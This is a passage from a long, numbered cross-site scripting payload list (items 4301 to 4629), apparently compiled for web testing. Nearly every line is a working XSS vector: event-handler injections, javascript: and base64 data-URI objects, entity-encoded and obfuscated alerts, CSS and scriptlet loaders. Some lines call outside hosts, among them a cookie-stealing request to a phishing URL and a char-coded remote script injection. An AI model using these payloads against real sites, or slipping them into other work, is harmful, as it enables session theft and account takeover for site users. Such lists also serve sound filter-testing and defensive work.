  4301. <NeatHtmlReplace_LINK REL=”stylesheet” HREF=”http://ha.ckers.org/xss.css">
  4302. <NeatHtmlReplace_LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
  4303. <NeatHtmlReplace_OBJECT classid=”clsid:ae24fdae-03c6–11d1–8b76–0080c744f389"><NeatHtmlReplace_param name=”url” value=”javascript:alert(‘XSS’)”></NeatHtmlReplace_OBJECT>
  4304. <NeatHtmlReplace_OBJECT TYPE=”text/x-scriptlet” DATA_NeatHtmlReplace=”http://ha.ckers.org/scriptlet.html"></NeatHtmlReplace_OBJECT>
  4305. </NeatHtmlReplace_STYLE><A CLASS=”XSS”></A>
  4306. <NeatHtmlReplace_STYLE>BODY{-moz-binding:url(“http://ha.ckers.org/xssmoz.xml#xss")}</NeatHtmlReplace_STYLE>
  4307. <NeatHtmlReplace_STYLE>@import’http://ha.ckers.org/xss.css';</NeatHtmlReplace_STYLE>
  4308. <NeatHtmlReplace_STYLE>@im\port’\ja\vasc\ript:alert(“XSS”)’;</NeatHtmlReplace_STYLE>
  4309. <NeatHtmlReplace_STYLE>li {list-style-image:url(“javascript:alert(‘XSS’)”);}</NeatHtmlReplace_STYLE><UL><LI>XSS
  4310. <NeatHtmlReplace_STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</NeatHtmlReplace_STYLE>
  4311. <NeatHtmlReplace_STYLE TYPE=”text/javascript”>alert(‘XSS’);</NeatHtmlReplace_STYLE>
  4312. <NeatHtmlReplace_STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}
  4313. <NeatHtmlReplace_TABLE><NeatHtmlParserReset s=’’ d=”” /><script></script><TD BACKGROUND_NeatHtmlReplace=”javascript:alert(‘XSS’)”>
  4314. </NeatHtmlReplace_TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
  4315. <NeatHtmlReplace_XML ID=”I”><NeatHtmlReplace_X>
  4316. <NeatHtmlReplace_XSS STYLE_NeatHtmlReplace=”behavior:url(xss.htc);”>
  4317. <NeatHtmlReplace_XSS STYLE_NeatHtmlReplace=”xss:expression(alert(‘XSS’))”>
  4318. <NeatHtmlReplace_xss:xss>XSS</NeatHtmlReplace_xss:xss> </NeatHtmlReplace_HTML>
  4319. (new Array).filter.constructor(‘alert(1)’)()
  4320. new class extends class extends class extends class extends alert(1){}{}{}{}
  4321. new Function`al\ert\`6\``;
  4322. new Function(location.search.slice(1))();
  4323. new Image().src=”http://xssor.io/phishing/cookie.asp?cookie="+escape(document.cookie);
  4324. &newLine;javascript:alert(1)
  4325. new new new new new`${alert(1)}`
  4326. new new new new new alert`1`
  4327. new XMLHttpRequest().open(“GET”, “data:text/html,<svg onload=confirm(2)></svg>”, false);
  4328. <noembed><img src=”</noembed><iframe onload=alert(1)>” /></noembed>
  4329. </noscript><br><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code>
  4330. <noscript><! — </noscript><img src=xx:x onerror=alert(1) →
  4331. <noscript><noscript></noscript><script>confirm(1)</script></noscript>
  4332. null%22%20style%3d%22background%3aexpression%28confirm%282727%29
  4333. o={1.e+1111(){alert(arguments.callee);}};o[1e1111]()//
  4334. o={1.e+1111(){alert(arguments.callee);}};o[1e1111]()
  4335. <object%20allowscriptaccess=always>%20<param%20name=code%20value=http://renwa.tk/xss.swf>
  4336. <object allowscriptaccess=always>
  4337. <object allowscriptaccess=”always” data=”test.swf”></object>
  4338. Object.bind(null,alert)()(1)
  4339. <object classid=”clsid:02BF25D5–8C17–4B23-BC80-D3488ABDDC6B” onqt_error=”alert(1)” style=”behavior:url(#x);”><param name=postdomevents /></object>
  4340. <object classid=”clsid:02BF25D5–8C17–4B23-BC80-D3488ABDDC6B” onqt_error=”javascript:alert(1)” style=”behavior:url(#x);”><param name=postdomevents /></object>
  4341. <OBJECT CLASSID=”clsid:333C7BC4–460F-11D0-BC04–0080C7055A83"><PARAM NAME=”DataURL” VALUE=”javascript:alert(1)”></OBJECT>
  4342. <OBJECT CLASSID=”clsid:333C7BC4–460F-11D0-BC04–0080C7055A83"><PARAM NAME=”DataURL” VALUE=”javascript:alert(1)”></OBJECT><;OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389>;<;param name=url value=javascript:alert(‘;XSS’;)>;<;/OBJECT>;
  4343. <;OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389>;<;param name=url value=javascript:alert(‘;XSS’;)>;<;/OBJECT>;
  4344. <OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389><param name=url value=javascript:alert(‘XSS’)></OBJECT>
  4345. <OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389><param name=url value=javascript:alert(XSS)></OBJECT>
  4346. <OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389><paramname=url value=javascript:alert(‘XSS’)></OBJECT>
  4347. <OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389><param name=url value=javascript:confirm(document.location)></OBJECT>
  4348. <OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389><param name=url value=javascript:document.vulnerable=true></object>
  4349. <OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>
  4350. <OBJECT classid=clsid:…” codebase=”javascript:alert(‘XSS’);”>
  4351. <object classid=”clsid:…” codebase=”javascript:document.vulnerable=true;”>
  4352. <object data=//0me.me/demo/xss/xssproject.swf?js=alert(document.domain);allowscriptaccess=always></object>
  4353. <object data=//0me.me/demo/xss/xssproject.swf?js=alert(document.domain); allowscriptaccess=always></object> // Soroush Dallili
  4354. <object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>
  4355. <object data=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==”type=”image/svg+xml”></object>
  4356. <object data=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB 4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy 8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml”></object> // Firefox only
  4357. <object data=”data:text/html;base64,%(base64)s”>
  4358. <object data=’data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4=’ /src>
  4359. <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik></object>
  4360. <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?
  4361. <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
  4362. ><object data=’data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4=’></object>”
  4363. “\”\/><object data=’data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4=’></object>”
  4364. <object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object>
  4365. <object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=”>
  4366. <object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=”> // Firefox only
  4367. <object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgvaW5zaWdodC1sYWJzLyk8L3NjcmlwdD4=”>
  4368. <object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”>
  4369. <object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></object>
  4370. <object+data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></object>
  4371. <object data=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+></object>
  4372. <object data=’data:text/xml,<script xmlns=”http://www.w3.org/1999/xhtml “>confirm(1)</script>>’>
  4373. <object/data=//goo.gl/nlX0P>
  4374. <object/data=//goo.gl/nlX0P?
  4375. <object/data=��//goo.gl/nlX0P��>
  4376. <object data=”http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?
  4377. <object data=”http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
  4378. “><object data=”http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
  4379. <OBJECT data=http://xss.ha.ckers.org width=400 height=400 type=text/x-scriptlet”>
  4380. <object data=”javascript:alert(0)”>
  4381. <object+data=”javascript:alert(0)”>
  4382. <object data=”javascript:alert(1)”>
  4383. <object data=javascript:alert(1)> *
  4384. <object data=javascript:alert(1)>
  4385. <object data=javascript:alert(1)>
  4386. <object data=javascript:alert(172)>
  4387. <object data=”javascript:alert(1)”> // FF <object/data=”javascript&colon;alert(1)”> // FF <object data=”&#x6A;avascript&colon;alert(1)”>
  4388. <object data=”javascript:alert(document.domain)”>
  4389. <object data=”javascript:alert(XSS)”>
  4390. <object/data=”javascript&colon;alert(1)”>
  4391. <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
  4392. <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
  4393. “/><object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
  4394. <object data=?p=%253Csvg/o%256Eload%253Dalert(1)%253E>
  4395. <object data=//pkav/test.swf><param name=movie value=//pkav/test.swf><param name=allowscriptaccess value=always></object>
  4396. <object data=”&#x6A;avascript&colon;alert(1)”>
  4397. <object data=”&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&# x72;&#x74;&#x28;&#x31;&#x29;”>
  4398. <object data=”&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;”>
  4399. Object.defineProperties(window,{‘location’:{value:’javascript:alert(1)’}})
  4400. Object.defineProperty(location,’href’,{writable:false})
  4401. <object id=”x” classid=”clsid:CB927D12–4FF7–4a9e-A169–56E4B8A75598"></object>
  4402. <object id=”x” classid=”clsid:CB927D12–4FF7–4a9e-A169–56E4B8A75598"></object> <object classid=”clsid:02BF25D5–8C17–4B23-BC80-D3488ABDDC6B” onqt_error=”javascript:alert(1)” style=”behavior:url(#x);”><param name=postdomevents /></object>
  4403. [Object[“keys”](this)[146]](1)
  4404. [Object[“keys”](this)[5]](1)
  4405. <object onafterscriptexecute=confirm(0)>
  4406. <object onbeforeload object onbeforeload=”javascript:javascript:alert(1)”></object onbeforeload>
  4407. <object onbeforescriptexecute=confirm(0)>
  4408. <object onerror=alert(1)>
  4409. <object onerror=javascript:javascript:alert(1)>
  4410. <object onError object onError=”javascript:javascript:alert(1)”></object onError>
  4411. <object onfocus=popup=1;>
  4412. <object><param name=”src” value=
  4413. <object><param name=”src” value=”javascript:alert(0)”></param></object>
  4414. Object.prototype[Symbol.toStringTag]=’<svg/onload=alert(1)>’;location=’javascript:1+{}’
  4415. Object.prototype[Symbol.toStringTag]=’<svg/onload=alert(1)>’;while(1){}location=’javascript:1+{}’
  4416. /* →]]>%>?></object></script></title></textarea></noscript></style></xmp>’-/”///><img id=”b1" src=1 onerror=’$.getScript(“http://xss.cx.js", function() { c(); });’>’
  4417. <object src=1 href=1 onerror=”javascript:alert(1)”></object>
  4418. <object type=’text/x-html’ data=’javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x’></object>
  4419. “<object type=’text/x-html’ data=’javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x’></object>”
  4420. “><object type=’text/x-html’ data=’javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x’></object>”,
  4421. “/><object type=’text/x-html’ data=’javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x’></object>
  4422. <OBJECT TYPE=”text/x-scriptlet” DATA=”http://hacker.com/xss.html">
  4423. <;OBJECT TYPE=”;text/x-scriptlet”; DATA=”;http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>;
  4424. <OBJECT TYPE=”text/x-scriptlet” DATA=”http://ha.ckers.org/scriptlet.html"></OBJECT>
  4425. <OBJECT TYPE=”text/x-scriptlet” DATA=”http://ha.ckers.org/scriptlet.html"></OBJECT>
  4426. <object type=”text/x-scriptlet” data=”http://jsfiddle.net/XLE63/ “></object>
  4427. “/><object type=”text/x-scriptlet” data=”http://jsfiddle.net/XLE63/ “></object>
  4428. <OBJECT TYPE=”text/x-scriptlet” DATA=”http://www.securitycompass.com/scriptlet.html"></object>
  4429. <OBJECT TYPE=”text/x-scriptlet” DATA=”http://xss.cx/scriptlet.html"></OBJECT>
  4430. <OBJECT TYPE=”text/x-scriptlet” DATA=”http://xxxx.com/scriptlet.html"></OBJECT>
  4431. <OBJECT TYPE=”text/x-scriptlet” DATA=”%(scriptlet)s”></OBJECT>
  4432. * {-o-link:’javascript:alert(1)’;-o-link-source: current;}
  4433. /”onafterscriptexecute=alert(‘XSS’) 1=’
  4434. “ onblur=alert(1) autofocus a=”
  4435. “onblur=alert(1)autofocusa=”
  4436. onblur=alert(1) autofocus a=
  4437. “ onblur=alert(XSS) “> <”
  4438. “onBlur=”&#x061;&#x06c;&#x065;&#x072;&#x074;&#x028;&#x027;&#x058;&#x053;&#x053;&#x027;&#x029;”
  4439. _.once(alert(9))
  4440. onclick=’addUser(“23&#000000000034)-alert(1)//”)’
  4441. onclick=’addUser(“23&quot)alert(1)//”)’
  4442. (/* */oNcliCk=alert() )
  4443. “onclick=alert(1)//
  4444. onclick=alert(1)
  4445. ‘“/onclick=’alert(1)’/accesskey=’X’
  4446. “ onclick=alert(1)//<button ‘ onclick=alert()//>
  4447. onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
  4448. “ onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
  4449. “ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
  4450. �� onclick=alert(1)//<button �� onclick=alert(1)//> */ alert(1)//
  4451. onclick=alert(1)//<button �� onclick=alert(1)//> */ alert(1)//
  4452. “ onclick=alert(1)//”>click
  4453. “ onclick=alert()//<button ‘ onclick=alert()//> */ alert()//<img style=”background-url=eval(onclick)” onclick=alert()>//>
  4454. onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>/*click me!#*/alert(1)
  4455. “ onclick=alert(XSS) “>
  4456. “onclick=”alert(‘XSS’)”
  4457. onclick=”delFeedback(‘2&apos)alert(1)//’)”
  4458. onclick=”elements[0].value=’<a/href=’%2BURL%2B’>link</a>’;submit()”>
  4459. onclick=”elements[0].value=’<a/href=’%2BURL%2B’>link</a>’;submit()”
  4460. onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);
  4461. onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>”
  4462. “onContextMenu=”&#x000061;&#x00006c;&#x000065;&#x000072;&#x000074;&#x000028;&#x000027;&#x000058;&#x000053;&#x000053;&#x000027;&#x000029;”
  4463. “onCopy=”&#x00061;&#x0006c;&#x00065;&#x00072;&#x00074;&#x00028;&#x00027;&#x00058;&#x00053;&#x00053;&#x00027;&#x00029;”
  4464. “oncut=alert(1)
  4465. “onDblClick=”&#119;indow[‘aleraaaat’.re&#0112;lace(‘aaaa’,’’)](‘XaaaaSaaaaS’.re&#0112;lace(‘aaaa’,’’).re&#0112;lace(‘aaaa’,’’))”
  4466. ‘/(ondblclick|onclick|onkeydown|onkeypress|onkeyup|onmousedown|onmousemove|onmouseout|onmouseover|onmouseup|onload|onunload|onerror)=[^<]*(?=\>)/Uis’,
  4467. “+onDblClick=prompt(123)”+
  4468. ?onend=javascript:alert(1)//”,
  4469. onerror%3Deval%3Bthrow’%3Dalert%5Cx281%5Cx29'%3B
  4470. “onerror=alert(1)//
  4471. ‘onerror=’alert(‘XSS’)’ a=’.jpg
  4472. ;onerror=confirm;throw 1;
  4473. onerror=confirm;throw 1;
  4474. onerror=’eval(atob(“cHJvbXB0KDEpOw==”))’>
  4475. onerror=eval;throw’=confirm\x281\x29';
  4476. “+onError=prompt(123)”+
  4477. one={{set(‘_factoryArgs.0’,’script’)}}
  4478. “ onfocus=alert(document.domain) “> <”
  4479. “ onfocus=alert(document.domain) “> <”
  4480. “ onfocus=alert(XSS) “> <”
  4481. “ onfocusin=alert(1) autofocus x=”
  4482. “onfocusin=alert(1)autofocus x=”
  4483. onfocusin=alert(1) autofocus x=
  4484. “onfocusin=”top[‘\x61\x6C\x65\x72\x74’](‘\x58\x53\x53’)”
  4485. onfocus=JaVaSCript:alert(123) autofocus
  4486. ‘ onfocus=JaVaSCript:alert(123) autofocus
  4487. “ onfocus=JaVaSCript:alert(123) autofocus
  4488. onfocus=location=window.name//&#039;
  4489. “ onfocusout=alert(1) autofocus x=”
  4490. “onfocusout=alert(1)autofocus x=”
  4491. onfocusout=alert(1) autofocus x=
  4492. “onfocusout=”parent[String.fromCharCode(500–403,500–392,500–399,500–386,500–384)](String.fromCharCode(300–212,300–217,300–217))”
  4493. “+onfocus=”prompt(1)”+
  4494. “ onfocus=prompt(1) autofocus fragment=”
  4495. “onfocus=”window[‘\141\154\145\162\164’](‘\130\123\123’)”
  4496. “ onfocus=”write(unescape(‘&#60;’)+’script src=’+unescape(‘&#34;&#104;&#116;&#116;&#112;&#58;&#47;&#47;’)
  4497. “ onhover=”j&#x61;vascript:&#x61;lert(-1)”
  4498. “onKeyDown=”&#00112;arent[‘aleraaaaat’.replace(‘aaaaa’,’’)](‘XaaaaaSaaaaaS’.replace(‘aaaaa’,’’).replace(‘aaaaa’,’’))”
  4499. onkeydown=function(){ http://window.open ('//example.com/','_blank','a');}
  4500. onkeydown=function(){ http://window.open (‘//example.com/’,’_blank’,’a’);
  4501. onkeypress=function(){ http://window.open (‘about:blank’,’_blank’).close();}
  4502. onkeypress=function(){ http://window.open (‘about:blank’,’_blank’).close();
  4503. “+onkeypress=”prompt(23)”+
  4504. “onload=”a=document.createElement(‘script’);a.setAttribute(‘src’,String.fromCharCode(104,116,116,112,58,47,47,109,97,108,101,114,105,115,99,104,46,110,101,116,47,97,46,106,115));document.body.appendChild(a)
  4505. onload=alert(1)>
  4506. ‘onload=alert(153)><svg/153=’
  4507. ‘onload=alert(1)><svg/1=’
  4508. onload=confirm(1)//
  4509. onload=forms[0].submit()></iframe><form method=POST
  4510. “onMouseDown=”&#00097;&#000108;&#000101;&#000114;&#000116;&#00040;&#00039;&#00088;&#00083;&#00083;&#00039;&#00041;”
  4511. “onMouseEnter=”&#000097;&#0000108;&#0000101;&#0000114;&#0000116;&#000040;&#000039;&#000088;&#000083;&#000083;&#000039;&#000041;”
  4512. “OnMouseEnter=”confirm()//
  4513. onmouseenter=prompt(document.domain)
  4514. “onMouseLeave=”&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;”
  4515. “onMouseMove=”&#097;&#0108;&#0101;&#0114;&#0116;&#040;&#039;&#088;&#083;&#083;&#039;&#041;”
  4516. “onMouseOut=”&#0097;&#00108;&#00101;&#00114;&#00116;&#0040;&#0039;&#0088;&#0083;&#0083;&#0039;&#0041;”
  4517. onmouseover
  4518. On Mouse Over
  4519. “onmouseover=”alert(1)
  4520. “onmouseover=alert(1)//
  4521. “ onmouseover=”alert(4321)” blah=”
  4522. “onmouseover=alert(77)//
  4523. ‘ onmouseover=alert(/Black.Spook/)
  4524. “ onmouseover=alert(XSS) “>
  4525. “ onmouseover=”confirm(1)”style=”position:absolute;width:100%;height:100%;top:0;left:0;”
  4526. ‘ onmouseover=confirm(document.location)
  4527. onmouseover=”document.cookie=true;”>//INJECTX
  4528. “onmouseover=”(new Function(‘rssseturn(alesssrt)’.&#x73plit(‘sss’).joi&#x6e(‘’)))()((‘SXS’+’SXS’).slice(-5,4))”
  4529. “ onmouseover=”prompt(0) x=”
  4530. “onmouseover=”prompt(0)x=”
  4531. onmouseover=prompt(100) bad=’
  4532. onmouseover=prompt(document.domain
  4533. “+onmouseover=”window.location=’http://localhost'
  4534. “onMouseUp=”wi&#110dow[Str&#105;ng.fromC&#104;arCode(501–404,501–393,501–400,501–387,501–385)]&#0000040;&#0000039;&#0000088;&#0000083;&#0000083;&#0000039;&#0000041;”
  4535. onreadystatechange=”alert(1)”>1</div>
  4536. onreadystatechange=”alert(2)”>2</div>
  4537. “+onReset=prompt(123)”+
  4538. “onresize=prompt(1)>
  4539. onscroll=alert(‘xss’)>
  4540. “onSelect=”&#x0061;&#x006c;&#x0065;&#x0072;&#x0074;&#x0028;&#x0027;&#x0058;&#x0053;&#x0053;&#x0027;&#x0029;”
  4541. onxxx=yyy
  4542. <o/onmouseover=o=prompt,o``>o
  4543. open(c2.canvas.toDataURL())
  4544. open(‘java’+’script:ale’+’rt(11)’);
  4545. open`javascript:alert(1)//#${‘_self’}`
  4546. open(name)
  4547. open(‘’,’_self’).alert(1)
  4548. Opera:<style>*{-o-link:’data:text/html,<svg/onload=alert(/@garethheyes/)>’;-o-link-source:current}</style><a href=1>aaa
  4549. <option>’><button><img src=x onerror=confirm(0);></button></option>
  4550. “<option>’><button><img src=x onerror=confirm(0);></button></option>”
  4551. ><option>’><button><img src=x onerror=confirm(1);></button></option>
  4552. “\”\/><option>’><button><img src=x onerror=confirm(1);></button></option>”,
  4553. oscriptaalert(�FXSS�F)o/scripta
  4554. “o<x>nmouseover=alert<x>(1)//
  4555. o={x:’’+<s>eva</s>+<s>l</s>,y:’’+<s>aler</s>+<s>t</s>+<s>(1)</s>};function f() { 0[this.x](this.y) }f.call(o);
  4556. <p/%0Aonmouseover%0A=%0Aconfirm(1)>renwax23
  4557. p=%26p=%26lt;svg/onload=alert(1)><j onclick=location%2B=document.body.textContent>click me!
  4558. ?page=javascript:alert(1)”
  4559. p=-alert(1)}//\
  4560. p=`-alert(1)”>’onload=”`<svg/1=’
  4561. p=*/alert(1)”>’onload=”/*<svg/1=’
  4562. p=*/alert(1)</script><script>/*
  4563. p=>alert(1)</script><script/1=
  4564. p=’>alert(1)</script><script/1=’
  4565. ?param1=<script>prompt(9);/*&param2=*/</script>
  4566. /?param=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
  4567. /?param=javascript:alert(document.cookie)
  4568. <param name=url value=https://l0.cm/xss.swf>
  4569. $.parseHTML(‘<img src=xx:X onerror=confirm(1)>’)
  4570. parseInt(“confirm”,30) == 8680439 && 8680439..toString(30) == “confirm”
  4571. parseInt(“prompt”,36);
  4572. <path d=”M0,0" style=”marker-start:url(test4.svg#a)”/>
  4573. PATH_INFO:/<link rel=import href=”/bypass/path/<script>alert(1)</script>”>
  4574. <p class=”comment” title=”*/eval(y);/*” data-comment=’{“id”:1}’></p>
  4575. <p class=”comment” title=””onload=’/*”></p>
  4576. <p class=”comment” title=”*/prompt(1)’”></p>
  4577. <p class=”comment” title=””><script>/*” data-comment=’{“id”:1}’></p>
  4578. <p class=”comment” title=”*/</script>” data-comment=’{“id”:1}’></p>
  4579. <p class=”comment” title=””><svg/a=”></p>
  4580. <p class=”comment” title=”*/x[0]=’a’;/*” data-comment=’{“id”:1}’></p>
  4581. <p class=”comment” title=”*/x[1]=’l’;/*” data-comment=’{“id”:1}’></p>
  4582. <p class=”comment” title=”*/x[2]=’e’;/*” data-comment=’{“id”:1}’></p>
  4583. <p class=”comment” title=”*/x[3]=’r’;/*” data-comment=’{“id”:1}’></p>
  4584. <p class=”comment” title=”*/x[4]=’t’;/*” data-comment=’{“id”:1}’></p>
  4585. <p class=”comment” title=”*/x[5]=’(‘;/*” data-comment=’{“id”:1}’></p>
  4586. <p class=”comment” title=”*/x[6]=’1';/*” data-comment=’{“id”:1}’></p>
  4587. <p class=”comment” title=”*/x[7]=’)’;/*” data-comment=’{“id”:1}’></p>
  4588. <p class=”comment” title=”*/x=new Array();/*” data-comment=’{“id”:1}’></p>
  4589. <p class=”comment” title=”*/y=x.join(‘’);/*” data-comment=’{“id”:1}’></p>
  4590. p.coords.longitude+’,Altitude:’+p.coords.altitude);})
  4591. perl -e &#039;print \”;<;IMG SRC=java\0script:alert(\”;XSS\”;)>;\”;;&#039; >; out
  4592. perl -e &#039;print \&quot;&lt;IMG SRC=java\0script:alert(\&quot;XSS\&quot;)&gt;\&quot;;&#039; &gt; out
  4593. perl -e &#039;print \&quot;&lt;SCR\0IPT&gt;alert(\&quot;XSS\&quot;)&lt;/SCR\0IPT&gt;\&quot;;&#039; &gt; out
  4594. perl -e &#039;print \”;<;SCR\0IPT>;alert(\”;XSS\”;)<;/SCR\0IPT>;\”;;&#039; >; out
  4595. perl -e &apos;print &quot;&amp;&lt;SCR\0IPT&gt;alert(&quot;XSS&quot;)&lt;/SCR\0IPT&gt;&quot;;&apos; &gt; out
  4596. perl -e &apos;print &quot;&lt;IMG SRC=java\0script:alert(&quot;XSS&quot;)>&quot;;&apos;&gt; out
  4597. perl -e ‘print “<IMG id=XSS SRC=java\0script:alert(\”XSS\”)>”;’ > out
  4598. perl -e ‘print “<IMG />”;’ > out
  4599. perl -e ‘print “<IMG SRC=java\0script:alert(“XSS”)>”;’> out
  4600. perl -e ‘print “<IMG SRC=java\0script:alert(“XSS”)>”;’ > out
  4601. perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
  4602. perl -e ‘print \”<IMG SRC=java\0script:alert(\”XSS\”)>\”;’ > out
  4603. perl -e ‘print “<IMG SRC_NeatHtmlReplace=”java\0script:alert(\&quot;XSS\&quot;)”>”;’ > out
  4604. perl -e ‘;print “;<;IM SRC=java\0script:alert(“;XSS”;)>”;;’;>; out
  4605. perl -e ‘print \”&lt;IMG SRC=java\0script&#058;alert(\\”XSS\\”)&gt;\”;’ &gt; out
  4606. perl -e ‘print \”&lt;SCR\0IPT&gt;alert(\\”XSS\\”)&lt;/SCR\0IPT&gt;\”;’ &gt; out
  4607. perl -e ‘print “&lt;SCR\0IPT&gt;alert(\”XSS\”)&lt;/SCR\0IPT&gt;”;’ > out
  4608. perl -e ‘print “<NeatHtmlLt />&lt;SCR\0IPT>alert(\”XSS\”)<NeatHtmlLt />&lt;/SCR\0IPT>”;’ > out
  4609. perl -e ‘;print “;&;<;SCR\0IPT>;alert(“;XSS”;)<;/SCR\0IPT>;”;;’; >; out
  4610. perl -e ‘print “<SCR\0IPT>alert(“XSS”)</SCR\0IPT>”;’ > out
  4611. perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
  4612. perl -e ‘print “&<SCR\0IPT>alert(“XSS”)</SCR\0IPT>”;’ > out
  4613. perl -e ‘print \”<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>\”;’ > out
  4614. ?pg=javascript:alert(1)”,
  4615. <p hidden?={{hidden}}>123</p>
  4616. PHNjcmlwdD5hbGVydCgnWFNTIScpPC9zY3JpcHQ+
  4617. PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
  4618. PHP a = val2
  4619. <?php echo $_SERVER[‘PHP_SELF’]?>
  4620. <?php header(“Access-Control-Allow-Origin: *”); ?>
  4621. <?php header(��Access-Control-Allow-Origin: *��); ?>
  4622. <?php header(Access-Control-Allow-Origin: *); ?>
  4623. <?php header(‘content-type:text/html;charset=utf-7-utf-8-shift_jis’);?>
  4624. phpmyadmin/js/canvg/flashcanvas.swf?id=test\));}catch(e){alert(document.domain)}//
  4625. “><p/id=1%0Aonmousemove%0A=%0Aconfirm`1`>hoveme
  4626. “><p id=””onmouseover=\u0070rompt(1) //
  4627. <p id=”x”>AAA</p>
  4628. <p id=x>javascrip<x>t:alert(<x>1)</p><math><a href=”#*/=x.innerText,a” xml:base=javascript:location/*>Click HERE
  4629. <p id=x>javascrip<x>t:alert(<x>2)</p><math><a href=”#*/=x.innerText,a” xml:base=javascript:location/*>Click HERE
